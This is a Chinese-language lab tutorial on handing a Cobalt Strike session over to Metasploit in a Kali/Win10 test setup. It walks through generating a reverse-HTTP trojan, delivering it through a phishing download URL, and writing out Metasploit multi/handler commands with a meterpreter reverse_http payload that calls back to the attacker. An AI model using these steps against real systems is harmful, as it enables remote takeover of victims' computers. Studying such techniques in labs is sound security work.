CobaltStrike权限传递MSF

一、测试环境

操作系统：

        1.VMware17

        2.kali 6.1.0-kali5-amd64

        3.Win10x64

软件：

        1.cs4.0

        2.metasploit v6.3.4-dev

二、测试思路

1.cs是一款渗透测试工具，但没有漏洞利用的模块，我们可以在拿到目标主机的权限后，将权限转移给msf，再进行漏洞利用。

三、测试流程

1.启动cs

这两步需要在不同终端进行

本机地址和你设置的密码

打开cs

这里主机名为自己的地址，密码为刚才设定的密码，其他默认

看到此页面就下载成功

2.渗透目的主机

1.设置监听器

点击耳机

配置监听器，beacon http（反向连接），两个http主机都填写本地ip地址，选择一个不冲突的端口号，点击保存。

2.生成木马

选择边栏上的攻击，我们攻击Win10，选择此类型木马。

选择我们刚刚创建的监听器，并使用x64的payload，点击生成，建议保存到tmp中

为了将木马注入对方主机，我们使用钓鱼url下载

选择我们刚才生成的木马，注意：一些电脑可能运行不了ext格式的文件，我们需要将url中的ext改为exe，根据自己需求决定，file.ext就是目标主机下载的木马程序。点击开始

会生成一个钓鱼URL

3.在目标主机访问此URL

输入后自动下载木马程序（前提关闭系统防火墙和杀毒软件）

运行此木马程序后，我们可以在cs上发现此主机已经上线

右键上线的主机，进入beacon会话，输入sleep 0，使主机直接回复

测试是否成功

3.将cs的权限传递给msf

1.在cs新建一个监听器

记住名字，使用Foreign外部http，输入本机ip地址及一个不冲突的端口，点击保存。

2.msf连接cs

使用msf中这此模块

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 本地ip
set lport 刚才新建cs监听器的端口号

输入run或者exploit开始运行

会出现这样一句话

返回cs，右键目标主机选择增添对话，选择我们新创建的监听器msf，点击choose

回到msf，我们会发现权限传递成功

出现此界面就代表传递成功，若不成功就反复增添会话和msf运行这两个步骤。

测试是否能使用此权限

乱码为msf版本编码问题